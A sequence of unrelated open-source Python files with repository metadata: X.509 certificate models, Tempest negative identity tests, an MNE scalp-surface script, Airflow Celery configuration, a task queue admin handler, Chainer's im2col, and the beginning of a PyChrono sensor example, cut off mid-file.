abstract = True
verbose_name = _('CA')
verbose_name_plural = _('CAs')
def get_revoked_certs(self):
"""
Returns revoked certificates of this CA
(does not include expired certificates)
"""
now = timezone.now()
return self.cert_set.filter(
revoked=True, validity_start__lte=now, validity_end__gte=now
)
def renew(self):
"""
Renew the certificate, private key and
validity end date of a CA
"""
super().renew()
for cert in self.cert_set.all():
cert.renew()
@property
def crl(self):
"""
Returns up to date CRL of this CA
"""
revoked_certs = self.get_revoked_certs()
crl = crypto.CRL()
now_str = datetime_to_string(timezone.now())
for cert in revoked_certs:
revoked = crypto.Revoked()
revoked.set_serial(bytes(str(cert.serial_number), 'utf8'))
revoked.set_reason(b'unspecified')
revoked.set_rev_date(bytes(str(now_str), 'utf8'))
crl.add_revoked(revoked)
return crl.export(self.x509, self.pkey, days=1, digest=b'sha256')
AbstractCa._meta.get_field('validity_end').default = default_ca_validity_end
class AbstractCert(BaseX509):
"""
Abstract Cert model
"""
ca = models.ForeignKey(
swapper.get_model_name('django_x509', 'Ca'),
on_delete=models.CASCADE,
verbose_name=_('CA'),
)
revoked = models.BooleanField(_('revoked'), default=False)
revoked_at = models.DateTimeField(
_('revoked at'), blank=True, null=True, default=None
)
def __str__(self):
return self.name
class Meta:
abstract = True
verbose_name = _('certificate')
verbose_name_plural = _('certificates')
unique_together = ('ca', 'serial_number')
def revoke(self):
"""
* flag certificate as revoked
* fill in revoked_at DateTimeField
"""
now = timezone.now()
self.revoked = True
self.revoked_at = now
self.save()
| {
"content_hash": "bc75f52fa6c1fe079017bbcbdc936324",
"timestamp": "",
"source": "github",
"line_count": 569,
"max_line_length": 87,
"avg_line_length": 33.96485061511424,
"alnum_prop": 0.5813929421504709,
"repo_name": "openwisp/django-x509",
"id": "b9dc05f8dbf3d89a4933a0b2fbbaceac3a36235c",
"size": "19326",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_x509/base/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1028"
},
{
"name": "Dockerfile",
"bytes": "284"
},
{
"name": "HTML",
"bytes": "3161"
},
{
"name": "JavaScript",
"bytes": "1989"
},
{
"name": "Python",
"bytes": "145612"
},
{
"name": "Shell",
"bytes": "941"
}
],
"symlink_target": ""
} |
try:
from shutil import which
except ImportError:
raise ValueError("The current version of Python doesn't support the"
"function 'which', normally located in shutil")
__author__ = "Nicholas C. Pandolfi"
__copyright__ = "Copyright (c) 2016 Nicholas C. Pandolfi"
__credits__ = "Stack Exchange"
__license__ = "MIT"
__email__ = "npandolfi@wpi.edu"
__status__ = "Development"
| {
"content_hash": "6d8b033d1dd86df3362446432cec49e2",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 72,
"avg_line_length": 22.61111111111111,
"alnum_prop": 0.6461916461916462,
"repo_name": "nickpandolfi/Cyther",
"id": "02a82116ce5c653e8e1aa6d636ae0b3b17de524b",
"size": "597",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cyther/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "6412"
},
{
"name": "Makefile",
"bytes": "367"
},
{
"name": "Python",
"bytes": "98665"
}
],
"symlink_target": ""
} |
from unittest import TestCase
from mock import Mock
from rapid.workflow.queue_handlers.container_handlers.container_handler import ContainerHandler
class TestContainerHandler(TestCase):
def setUp(self):
self.container_handler = TestingContainerHandler(Mock())
def test_get_grain_type_split_non_splitter(self):
self.assertEqual(['not splittable'], self.container_handler._get_grain_type_split('not splittable'))
def test_get_grain_type_split_with_splitter(self):
self.assertEqual(['testing', 'worky!'], self.container_handler._get_grain_type_split('testing://worky!'))
def test_can_process_work_request_with_bad_data(self):
self.assertFalse(self.container_handler.can_process_work_request(Mock(grain='bad')))
def test_can_process_work_request_with_good_data(self):
self.assertTrue(self.container_handler.can_process_work_request(Mock(grain='testing://worky!')))
def test_can_process_action_instance_with_bad_data(self):
self.assertFalse(self.container_handler.can_process_action_instance({'grain': 'bad'}))
def test_can_process_action_instance_with_good_data(self):
self.assertTrue(self.container_handler.can_process_action_instance({'grain': 'testing://again!'}))
class TestingContainerHandler(ContainerHandler):
def cancel_worker(self, action_instance):
pass
def process_work_request(self, work_request, clients):
pass
def process_action_instance(self, action_instance, clients):
pass
@property
def container_identifier(self):
return 'testing'
| {
"content_hash": "587924fa9ef83012ca453678479535ad",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 113,
"avg_line_length": 36.29545454545455,
"alnum_prop": 0.7188478396994364,
"repo_name": "BambooHR/rapid",
"id": "d006fc2d23fec8cf1bbb46baedb754219995ae9a",
"size": "1597",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/workflow/test_container_handler.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1235"
},
{
"name": "Mako",
"bytes": "1069"
},
{
"name": "Python",
"bytes": "665011"
},
{
"name": "Shell",
"bytes": "6411"
}
],
"symlink_target": ""
} |
"""
Create high-resolution head surfaces for coordinate alignment.
example usage: mne make_scalp_surfaces --overwrite --subject sample
"""
from __future__ import print_function
import os
import os.path as op
import sys
import mne
if __name__ == '__main__':
from mne.commands.utils import get_optparser
parser = get_optparser(__file__)
parser.add_option('-o', '--overwrite', dest='overwrite',
action='store_true',
help='Overwrite previously computed surface')
parser.add_option('-s', '--subject', dest='subject',
help='The name of the subject', type='str')
parser.add_option('-f', '--force', dest='force', action='store_true',
help='Force transformation of surface into bem.')
parser.add_option('-v', '--verbose', dest='verbose', action='store_true',
help='Print the debug messages.')
options, args = parser.parse_args()
env = os.environ
subject = vars(options).get('subject', env.get('SUBJECT'))
if subject is None:
parser.print_help()
sys.exit(1)
overwrite = options.overwrite
verbose = options.verbose
force = '--force' if options.force else '--check'
from mne.commands.utils import get_status_output
def my_run_cmd(cmd, err_msg):
sig, out, error = get_status_output(cmd)
if verbose:
print(out, error)
if sig != 0:
print(err_msg)
sys.exit(1)
if not 'SUBJECTS_DIR' in env:
print('The environment variable SUBJECTS_DIR should be set')
sys.exit(1)
if not op.isabs(env['SUBJECTS_DIR']):
env['SUBJECTS_DIR'] = op.abspath(env['SUBJECTS_DIR'])
subj_dir = env['SUBJECTS_DIR']
if not 'MNE_ROOT' in env:
print('MNE_ROOT environment variable is not set')
sys.exit(1)
if not 'FREESURFER_HOME' in env:
print('The FreeSurfer environment needs to be set up for this script')
sys.exit(1)
subj_path = op.join(subj_dir, subject)
if not op.exists(subj_path):
print(('%s does not exits. Please check your subject directory '
'path.' % subj_path))
sys.exit(1)
if op.exists(op.join(subj_path, 'mri', 'T1.mgz')):
mri = 'T1.mgz'
else:
mri = 'T1'
print('1. Creating a dense scalp tessellation with mkheadsurf...')
def check_seghead(surf_path=op.join(subj_path, 'surf')):
for k in ['/lh.seghead', '/lh.smseghead']:
surf = surf_path + k if op.exists(surf_path + k) else None
if surf is not None:
break
return surf
my_seghead = check_seghead()
if my_seghead is None:
cmd = 'mkheadsurf -subjid %s -srcvol %s >/dev/null' % (subject, mri)
my_run_cmd(cmd, 'mkheadsurf failed')
else:
print('%s/surf/%s already there' % (subj_path, my_seghead))
if not overwrite:
print('Use the --overwrite option to replace exisiting surfaces.')
sys.exit()
surf = check_seghead()
if surf is None:
print('mkheadsurf did not produce the standard output file.')
sys.exit(1)
fif = '{0}/{1}/bem/{1}-head-dense.fif'.format(subj_dir, subject)
print('2. Creating %s ...' % fif)
cmd = 'mne_surf2bem --surf %s --id 4 %s --fif %s' % (surf, force, fif)
my_run_cmd(cmd, 'Failed to create %s, see above' % fif)
levels = 'medium', 'sparse'
for ii, (n_tri, level) in enumerate(zip([30000, 2500], levels), 3):
my_surf = mne.read_bem_surfaces(fif)[0]
print('%i. Creating medium grade tessellation...' % ii)
print('%i.1 Decimating the dense tessellation...' % ii)
points, tris = mne.decimate_surface(points=my_surf['rr'],
triangles=my_surf['tris'],
n_triangles=n_tri)
out_fif = fif.replace('dense', level)
print('%i.2 Creating %s' % (ii, out_fif))
surf_fname = '/tmp/tmp-surf.surf'
# convert points to meters, make mne_analyze happy
mne.write_surface(surf_fname, points * 1e3, tris)
# XXX for some reason --check does not work here.
cmd = 'mne_surf2bem --surf %s --id 4 --force --fif %s'
cmd %= (surf_fname, out_fif)
my_run_cmd(cmd, 'Failed to create %s, see above' % out_fif)
os.remove(surf_fname)
sys.exit(0)
| {
"content_hash": "b91f8f3238d5ac61b1a706874a8daca2",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 78,
"avg_line_length": 36.048780487804876,
"alnum_prop": 0.5757780784844384,
"repo_name": "jaeilepp/eggie",
"id": "a1a18ffcfd328fac3b89fdc129444d84cb0103fb",
"size": "4679",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "mne/commands/mne_make_scalp_surfaces.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "3357472"
}
],
"symlink_target": ""
} |
from Unix import Unix
# class Android
class Android(Unix):
# ctor
def __init__(self):
Unix.__init__(self) | {
"content_hash": "f27c20e7c4e1ff6a8ba652b2da341018",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 21,
"avg_line_length": 15.714285714285714,
"alnum_prop": 0.6636363636363637,
"repo_name": "dmsovetov/pygling",
"id": "b10c5d9c4a5ed444b80e1a11c5e693fc16e6ea2f",
"size": "1427",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Pygling/Platform/Android.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5335"
},
{
"name": "Python",
"bytes": "231527"
},
{
"name": "Shell",
"bytes": "2859"
}
],
"symlink_target": ""
} |
import uuid
from tempest.api.identity import base
from tempest.common.utils import data_utils
from tempest import exceptions
from tempest import test
class UsersNegativeTestJSON(base.BaseIdentityV2AdminTest):
_interface = 'json'
@classmethod
def setUpClass(cls):
super(UsersNegativeTestJSON, cls).setUpClass()
cls.alt_user = data_utils.rand_name('test_user_')
cls.alt_password = data_utils.rand_name('pass_')
cls.alt_email = cls.alt_user + '@testmail.tm'
@test.attr(type=['negative', 'gate'])
def test_create_user_by_unauthorized_user(self):
# Non-administrator should not be authorized to create a user
self.data.setup_test_tenant()
self.assertRaises(exceptions.Unauthorized,
self.non_admin_client.create_user, self.alt_user,
self.alt_password, self.data.tenant['id'],
self.alt_email)
@test.attr(type=['negative', 'gate'])
def test_create_user_with_empty_name(self):
# User with an empty name should not be created
self.data.setup_test_tenant()
self.assertRaises(exceptions.BadRequest, self.client.create_user, '',
self.alt_password, self.data.tenant['id'],
self.alt_email)
@test.attr(type=['negative', 'gate'])
def test_create_user_with_name_length_over_255(self):
# Length of user name filed should be restricted to 255 characters
self.data.setup_test_tenant()
self.assertRaises(exceptions.BadRequest, self.client.create_user,
'a' * 256, self.alt_password,
self.data.tenant['id'], self.alt_email)
@test.attr(type=['negative', 'gate'])
def test_create_user_with_duplicate_name(self):
# Duplicate user should not be created
self.data.setup_test_user()
self.assertRaises(exceptions.Conflict, self.client.create_user,
self.data.test_user, self.data.test_password,
self.data.tenant['id'], self.data.test_email)
@test.attr(type=['negative', 'gate'])
def test_create_user_for_non_existent_tenant(self):
# Attempt to create a user in a non-existent tenant should fail
self.assertRaises(exceptions.NotFound, self.client.create_user,
self.alt_user, self.alt_password, '49ffgg99999',
self.alt_email)
@test.attr(type=['negative', 'gate'])
def test_create_user_request_without_a_token(self):
# Request to create a user without a valid token should fail
self.data.setup_test_tenant()
# Get the token of the current client
token = self.client.auth_provider.get_token()
# Delete the token from database
self.client.delete_token(token)
self.assertRaises(exceptions.Unauthorized, self.client.create_user,
self.alt_user, self.alt_password,
self.data.tenant['id'], self.alt_email)
# Unset the token to allow further tests to generate a new token
self.client.auth_provider.clear_auth()
@test.attr(type=['negative', 'gate'])
def test_create_user_with_enabled_non_bool(self):
# Attempt to create a user with valid enabled para should fail
self.data.setup_test_tenant()
name = data_utils.rand_name('test_user_')
self.assertRaises(exceptions.BadRequest, self.client.create_user,
name, self.alt_password,
self.data.tenant['id'],
self.alt_email, enabled=3)
@test.attr(type=['negative', 'gate'])
def test_update_user_for_non_existent_user(self):
# Attempt to update a user non-existent user should fail
user_name = data_utils.rand_name('user-')
non_existent_id = str(uuid.uuid4())
self.assertRaises(exceptions.NotFound, self.client.update_user,
non_existent_id, name=user_name)
@test.attr(type=['negative', 'gate'])
def test_update_user_request_without_a_token(self):
# Request to update a user without a valid token should fail
# Get the token of the current client
token = self.client.auth_provider.get_token()
# Delete the token from database
self.client.delete_token(token)
self.assertRaises(exceptions.Unauthorized, self.client.update_user,
self.alt_user)
# Unset the token to allow further tests to generate a new token
self.client.auth_provider.clear_auth()
@test.attr(type=['negative', 'gate'])
def test_update_user_by_unauthorized_user(self):
# Non-administrator should not be authorized to update user
self.data.setup_test_tenant()
self.assertRaises(exceptions.Unauthorized,
self.non_admin_client.update_user, self.alt_user)
@test.attr(type=['negative', 'gate'])
def test_delete_users_by_unauthorized_user(self):
# Non-administrator user should not be authorized to delete a user
self.data.setup_test_user()
self.assertRaises(exceptions.Unauthorized,
self.non_admin_client.delete_user,
self.data.user['id'])
@test.attr(type=['negative', 'gate'])
def test_delete_non_existent_user(self):
# Attempt to delete a non-existent user should fail
self.assertRaises(exceptions.NotFound, self.client.delete_user,
'junk12345123')
@test.attr(type=['negative', 'gate'])
def test_delete_user_request_without_a_token(self):
# Request to delete a user without a valid token should fail
# Get the token of the current client
token = self.client.auth_provider.get_token()
# Delete the token from database
self.client.delete_token(token)
self.assertRaises(exceptions.Unauthorized, self.client.delete_user,
self.alt_user)
# Unset the token to allow further tests to generate a new token
self.client.auth_provider.clear_auth()
@test.attr(type=['negative', 'gate'])
def test_authentication_for_disabled_user(self):
# Disabled user's token should not get authenticated
self.data.setup_test_user()
self.disable_user(self.data.test_user)
self.assertRaises(exceptions.Unauthorized, self.token_client.auth,
self.data.test_user,
self.data.test_password,
self.data.test_tenant)
@test.attr(type=['negative', 'gate'])
def test_authentication_when_tenant_is_disabled(self):
# User's token for a disabled tenant should not be authenticated
self.data.setup_test_user()
self.disable_tenant(self.data.test_tenant)
self.assertRaises(exceptions.Unauthorized, self.token_client.auth,
self.data.test_user,
self.data.test_password,
self.data.test_tenant)
@test.attr(type=['negative', 'gate'])
def test_authentication_with_invalid_tenant(self):
# User's token for an invalid tenant should not be authenticated
self.data.setup_test_user()
self.assertRaises(exceptions.Unauthorized, self.token_client.auth,
self.data.test_user,
self.data.test_password,
'junktenant1234')
@test.attr(type=['negative', 'gate'])
def test_authentication_with_invalid_username(self):
# Non-existent user's token should not get authenticated
self.data.setup_test_user()
self.assertRaises(exceptions.Unauthorized, self.token_client.auth,
'junkuser123', self.data.test_password,
self.data.test_tenant)
@test.attr(type=['negative', 'gate'])
def test_authentication_with_invalid_password(self):
# User's token with invalid password should not be authenticated
self.data.setup_test_user()
self.assertRaises(exceptions.Unauthorized, self.token_client.auth,
self.data.test_user, 'junkpass1234',
self.data.test_tenant)
@test.attr(type=['negative', 'gate'])
def test_get_users_by_unauthorized_user(self):
# Non-administrator user should not be authorized to get user list
self.data.setup_test_user()
self.assertRaises(exceptions.Unauthorized,
self.non_admin_client.get_users)
@test.attr(type=['negative', 'gate'])
def test_get_users_request_without_token(self):
# Request to get list of users without a valid token should fail
token = self.client.auth_provider.get_token()
self.client.delete_token(token)
self.assertRaises(exceptions.Unauthorized, self.client.get_users)
self.client.auth_provider.clear_auth()
@test.attr(type=['negative', 'gate'])
def test_list_users_with_invalid_tenant(self):
# Should not be able to return a list of all
# users for a non-existent tenant
# Assign invalid tenant ids
invalid_id = list()
invalid_id.append(data_utils.rand_name('999'))
invalid_id.append('alpha')
invalid_id.append(data_utils.rand_name("dddd@#%%^$"))
invalid_id.append('!@#()$%^&*?<>{}[]')
# List the users with invalid tenant id
for invalid in invalid_id:
self.assertRaises(exceptions.NotFound,
self.client.list_users_for_tenant, invalid)
class UsersNegativeTestXML(UsersNegativeTestJSON):
_interface = 'xml'
| {
"content_hash": "92545f90691b16e38336933fe5958c40",
"timestamp": "",
"source": "github",
"line_count": 218,
"max_line_length": 77,
"avg_line_length": 44.908256880733944,
"alnum_prop": 0.6171603677221654,
"repo_name": "cloudbase/lis-tempest",
"id": "a584a7b8bba4a59e102f9c9902741db0bdfe806a",
"size": "10426",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tempest/api/identity/admin/test_users_negative.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3377111"
},
{
"name": "Shell",
"bytes": "8663"
}
],
"symlink_target": ""
} |
import ssl
from airflow import configuration
from airflow.exceptions import AirflowConfigException, AirflowException
from airflow.utils.log.logging_mixin import LoggingMixin
def _broker_supports_visibility_timeout(url):
return url.startswith("redis://") or url.startswith("sqs://")
log = LoggingMixin().log
broker_url = configuration.conf.get('celery', 'BROKER_URL')
broker_transport_options = configuration.conf.getsection(
'celery_broker_transport_options'
)
if 'visibility_timeout' not in broker_transport_options:
if _broker_supports_visibility_timeout(broker_url):
broker_transport_options = {'visibility_timeout': 21600}
DEFAULT_CELERY_CONFIG = {
'accept_content': ['json', 'pickle'],
'event_serializer': 'json',
'worker_prefetch_multiplier': 1,
'task_acks_late': True,
'task_default_queue': configuration.conf.get('celery', 'DEFAULT_QUEUE'),
'task_default_exchange': configuration.conf.get('celery', 'DEFAULT_QUEUE'),
'broker_url': broker_url,
'broker_transport_options': broker_transport_options,
'result_backend': configuration.conf.get('celery', 'RESULT_BACKEND'),
'worker_concurrency': configuration.conf.getint('celery', 'WORKER_CONCURRENCY'),
}
celery_ssl_active = False
try:
celery_ssl_active = configuration.conf.getboolean('celery', 'SSL_ACTIVE')
except AirflowConfigException as e:
log.warning("Celery Executor will run without SSL")
try:
if celery_ssl_active:
broker_use_ssl = {'keyfile': configuration.conf.get('celery', 'SSL_KEY'),
'certfile': configuration.conf.get('celery', 'SSL_CERT'),
'ca_certs': configuration.conf.get('celery', 'SSL_CACERT'),
'cert_reqs': ssl.CERT_REQUIRED}
DEFAULT_CELERY_CONFIG['broker_use_ssl'] = broker_use_ssl
except AirflowConfigException as e:
raise AirflowException('AirflowConfigException: SSL_ACTIVE is True, '
'please ensure SSL_KEY, '
'SSL_CERT and SSL_CACERT are set')
except Exception as e:
raise AirflowException('Exception: There was an unknown Celery SSL Error. '
'Please ensure you want to use '
'SSL and/or have all necessary certs and key ({}).'.format(e))
result_backend = DEFAULT_CELERY_CONFIG['result_backend']
if 'amqp' in result_backend or 'redis' in result_backend or 'rpc' in result_backend:
log.warning("You have configured a result_backend of %s, it is highly recommended "
"to use an alternative result_backend (i.e. a database).", result_backend)
| {
"content_hash": "e8a87bb24fe733b1567a11d71a0f0a15",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 90,
"avg_line_length": 43.19672131147541,
"alnum_prop": 0.6717267552182163,
"repo_name": "andyxhadji/incubator-airflow",
"id": "d44f2b3448afff4e1555ab5ed2728671a835106b",
"size": "3447",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "airflow/config_templates/default_celery.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "69070"
},
{
"name": "Dockerfile",
"bytes": "2001"
},
{
"name": "HTML",
"bytes": "280687"
},
{
"name": "JavaScript",
"bytes": "1385620"
},
{
"name": "Mako",
"bytes": "1284"
},
{
"name": "Python",
"bytes": "4480490"
},
{
"name": "Shell",
"bytes": "41922"
}
],
"symlink_target": ""
} |
"""A handler that displays task information for a single queue."""
import datetime
import urllib
from google.appengine.api import apiproxy_stub_map
from google.appengine.api.taskqueue import taskqueue_service_pb
from google.appengine.api.taskqueue import taskqueue_stub
from google.appengine.tools.devappserver2.admin import admin_request_handler
from google.appengine.tools.devappserver2.admin import taskqueue_utils
_TASKS_TO_LOAD = 1000
# TODO: Make "Run" work.
class TaskQueueTasksHandler(admin_request_handler.AdminRequestHandler):
"""A handler that displays queue information for the application."""
@staticmethod
def _get_tasks(queue_name,
count,
start_task_name=None,
start_eta_usec=None):
request = taskqueue_service_pb.TaskQueueQueryTasksRequest()
request.set_queue_name(queue_name)
request.set_max_rows(count)
if start_task_name is not None:
request.set_start_task_name(start_task_name)
if start_eta_usec is not None:
request.set_start_eta_usec(start_eta_usec)
response = taskqueue_service_pb.TaskQueueQueryTasksResponse()
apiproxy_stub_map.MakeSyncCall('taskqueue',
'QueryTasks',
request,
response)
now = datetime.datetime.utcnow()
for task in response.task_list():
# Nothing is done with the body so save some memory and CPU by removing
# it.
task.set_body('')
yield taskqueue_stub.QueryTasksResponseToDict(queue_name, task, now)
@staticmethod
def _delete_task(queue_name, task_name):
request = taskqueue_service_pb.TaskQueueDeleteRequest()
request.set_queue_name(queue_name)
request.task_name_list().append(task_name)
response = taskqueue_service_pb.TaskQueueDeleteResponse()
apiproxy_stub_map.MakeSyncCall('taskqueue',
'Delete',
request,
response)
return response.result(0)
@staticmethod
def _run_task(queue_name, task_name):
request = taskqueue_service_pb.TaskQueueForceRunRequest()
request.set_queue_name(queue_name)
request.set_task_name(task_name)
response = taskqueue_service_pb.TaskQueueForceRunResponse()
apiproxy_stub_map.MakeSyncCall('taskqueue',
'ForceRun',
request,
response)
return response.result()
def get(self, queue_name):
super(TaskQueueTasksHandler, self).get()
queue_info = taskqueue_utils.QueueInfo.get(
queue_names=frozenset([queue_name])).next()
tasks = list(self._get_tasks(queue_name, count=_TASKS_TO_LOAD))
self.response.write(
self.render(
'taskqueue_tasks.html',
{'is_push_queue':
queue_info.mode == taskqueue_service_pb.TaskQueueMode.PUSH,
'page': self.request.get('page'),
'queue_info': queue_info,
'queue_name': queue_name,
'tasks': tasks,
'error': self.request.get('message')}))
def post(self, queue_name):
"""Handle modifying actions and redirect to a GET page."""
super(TaskQueueTasksHandler, self).post()
task_name = self.request.get('task_name')
if self.request.get('action:deletetask'):
result = self._delete_task(queue_name, task_name)
elif self.request.get('action:runtask'):
result = self._run_task(queue_name, task_name)
if result == taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE:
message = 'Queue "%s" not found' % queue_name
elif result == taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK:
message = 'Task "%s" not found' % task_name
elif result != taskqueue_service_pb.TaskQueueServiceError.OK:
message = 'Internal error'
else:
message = ''
self.redirect(
'%s?%s' % (self.request.path_url,
urllib.urlencode({'page': self.request.get('page'),
'message': message})))
| {
"content_hash": "ded69a5ec09ffe69cdfb5bd7109bb89f",
"timestamp": "",
"source": "github",
"line_count": 112,
"max_line_length": 77,
"avg_line_length": 36.955357142857146,
"alnum_prop": 0.6267214302971732,
"repo_name": "GoogleCloudPlatform/python-compat-runtime",
"id": "ea5f11af297b43365ee45ae39a7ad5643a3477da",
"size": "4740",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "appengine-compat/exported_appengine_sdk/google/appengine/tools/devappserver2/admin/taskqueue_tasks_handler.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "30211"
},
{
"name": "HTML",
"bytes": "171272"
},
{
"name": "JavaScript",
"bytes": "414229"
},
{
"name": "Makefile",
"bytes": "2138"
},
{
"name": "PHP",
"bytes": "3132250"
},
{
"name": "Python",
"bytes": "11709249"
},
{
"name": "Shell",
"bytes": "1787"
}
],
"symlink_target": ""
} |
import numpy
from chainer import function_node
from chainer.utils.conv import col2im_cpu
from chainer.utils.conv import col2im_gpu
from chainer.utils.conv import im2col_cpu
from chainer.utils.conv import im2col_gpu
from chainer.utils import type_check
def _pair(x):
if hasattr(x, '__getitem__'):
return x
return x, x
def _col2im(x, *args, **kwargs):
if isinstance(x, numpy.ndarray):
return col2im_cpu(x, *args, **kwargs)
return col2im_gpu(x, *args, **kwargs)
def _im2col(x, *args, **kwargs):
if isinstance(x, numpy.ndarray):
return im2col_cpu(x, *args, **kwargs)
return im2col_gpu(x, *args, **kwargs)
class Im2Col(function_node.FunctionNode):
"""Im2Col function."""
def __init__(self, ksize, stride, pad, cover_all, dilate):
self.kh, self.kw = _pair(ksize)
self.sy, self.sx = _pair(stride)
self.ph, self.pw = _pair(pad)
self.dy, self.dx = _pair(dilate)
self.cover_all = cover_all
def check_type_forward(self, in_types):
type_check._argname(in_types, ('x',))
x_type = in_types[0]
type_check.expect(
x_type.dtype.kind == 'f',
x_type.ndim == 4
)
def forward(self, inputs):
x, = inputs
y = _im2col(
x, self.kh, self.kw, self.sy, self.sx, self.ph, self.pw,
cover_all=self.cover_all, dy=self.dy, dx=self.dx)
n, c, kh, kw, out_h, out_w = y.shape
return y.reshape(n, c * kh * kw, out_h, out_w),
def backward(self, indexes, grad_outputs):
return Im2ColGrad((self.kh, self.kw), (self.sy, self.sx),
(self.ph, self.pw), self.cover_all,
(self.dy, self.dx), self.inputs[0].shape) \
.apply(grad_outputs)
class Im2ColGrad(function_node.FunctionNode):
"""Im2Col gradient function."""
def __init__(self, ksize, stride, pad, cover_all, dilate, in_shape):
self.kh, self.kw = _pair(ksize)
self.sy, self.sx = _pair(stride)
self.ph, self.pw = _pair(pad)
self.dy, self.dx = _pair(dilate)
self.cover_all = cover_all
self.in_shape = in_shape
def check_type_forward(self, in_types):
type_check._argname(in_types, ('gy',))
gy_type = in_types[0]
type_check.expect(
gy_type.dtype.kind == 'f',
gy_type.ndim == 4
)
def forward(self, inputs):
_, c, h, w = self.in_shape
gy, = inputs
n, _, out_h, out_w = gy.shape
gy = gy.reshape(n, c, self.kh, self.kw, out_h, out_w)
gx = _col2im(
gy, self.sy, self.sx, self.ph, self.pw, h, w, self.dy, self.dx)
return gx,
def backward(self, indexes, grad_outputs):
return Im2Col(
(self.kh, self.kw), (self.sy, self.sx),
(self.ph, self.pw), self.cover_all,
(self.dy, self.dx)).apply(grad_outputs)
def im2col(x, ksize, stride=1, pad=0, cover_all=False, dilate=1):
"""Extract patches from an image based on the filter.
This function rearranges patches of an image and puts them in the channel
dimension of the output.
Patches are extracted at positions shifted by multiples of ``stride`` from
the first position ``-pad`` for each spatial axis.
The right-most (or bottom-most) patches do not run over the padded spatial
size.
Notation: here is a notation.
- :math:`n` is the batch size.
- :math:`c` is the number of the input channels.
- :math:`h` and :math:`w` are the height and width of the input image,
respectively.
- :math:`k_H` and :math:`k_W` are the height and width of the filters,
respectively.
- :math:`s_Y` and :math:`s_X` are the strides of the filter.
- :math:`p_H` and :math:`p_W` are the spatial padding sizes.
- :math:`d_Y` and :math:`d_X` are the dilation factors of filter \
application.
The output size :math:`(h_O, w_O)` is determined by the following
equations when ``cover_all = False``:
.. math::
h_O &= (h + 2p_H - k_H - (k_H - 1) * (d_Y - 1)) / s_Y + 1,\\\\
w_O &= (w + 2p_W - k_W - (k_W - 1) * (d_X - 1)) / s_X + 1.
When ``cover_all = True``, the output size is determined by
the following equations:
.. math::
h_O &= (h + 2p_H - k_H - (k_H - 1) * (d_Y - 1) + s_Y - 1) / s_Y + 1,\\\\
w_O &= (w + 2p_W - k_W - (k_W - 1) * (d_X - 1) + s_X - 1) / s_X + 1.
Args:
x (:class:`~chainer.Variable` or :ref:`ndarray`):
Input variable of shape :math:`(n, c, h, w)`.
ksize (int or pair of ints): Size of filters (a.k.a. kernels).
``ksize=k`` and ``ksize=(k, k)`` are equivalent.
stride (int or pair of ints): Stride of filter applications.
``stride=s`` and ``stride=(s, s)`` are equivalent.
pad (int or pair of ints): Spatial padding width for input arrays.
``pad=p`` and ``pad=(p, p)`` are equivalent.
cover_all (bool): If ``True``, all spatial locations are rearranged
into some output pixels. It may make the output size larger.
dilate (int or pair of ints): Dilation factor of filter applications.
``dilate=d`` and ``dilate=(d, d)`` are equivalent.
Returns:
~chainer.Variable:
Output variable whose shape is
:math:`(n, c \\cdot k_H \\cdot k_W, h_O, w_O)`
"""
return Im2Col(ksize, stride, pad, cover_all, dilate).apply((x,))[0]
| {
"content_hash": "81b42a0cd8b311ef3c99c9966ede4ce4",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 79,
"avg_line_length": 33.91975308641975,
"alnum_prop": 0.5670609645131938,
"repo_name": "wkentaro/chainer",
"id": "0f70f81914bd7adbfc285eab7168a3865748765a",
"size": "5495",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "chainer/functions/array/im2col.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3368"
},
{
"name": "C",
"bytes": "1231"
},
{
"name": "C++",
"bytes": "1662966"
},
{
"name": "CMake",
"bytes": "50912"
},
{
"name": "Cuda",
"bytes": "178765"
},
{
"name": "Dockerfile",
"bytes": "3316"
},
{
"name": "PowerShell",
"bytes": "7197"
},
{
"name": "Python",
"bytes": "6041757"
},
{
"name": "Shell",
"bytes": "41813"
}
],
"symlink_target": ""
} |
import pychrono.core as chrono
import pychrono.sensor as sens
import math
import time
def main():
# -----------------
# Create the system
# -----------------
mphysicalSystem = chrono.ChSystemNSC()
# -----------------------------------
# add a mesh to be sensed by a camera
# -----------------------------------
mmesh = chrono.ChTriangleMeshConnected()
mmesh.LoadWavefrontMesh(chrono.GetChronoDataFile(
"vehicle/hmmwv/hmmwv_chassis.obj"), False, True)
# scale to a different size
mmesh.Transform(chrono.ChVectorD(0, 0, 0), chrono.ChMatrix33D(2))
trimesh_shape = chrono.ChTriangleMeshShape()
trimesh_shape.SetMesh(mmesh)
trimesh_shape.SetName("HMMWV Chassis Mesh")
trimesh_shape.SetMutable(False)
mesh_body = chrono.ChBody()
mesh_body.SetPos(chrono.ChVectorD(0, 0, 0))
mesh_body.AddVisualShape(trimesh_shape)
mesh_body.SetBodyFixed(True)
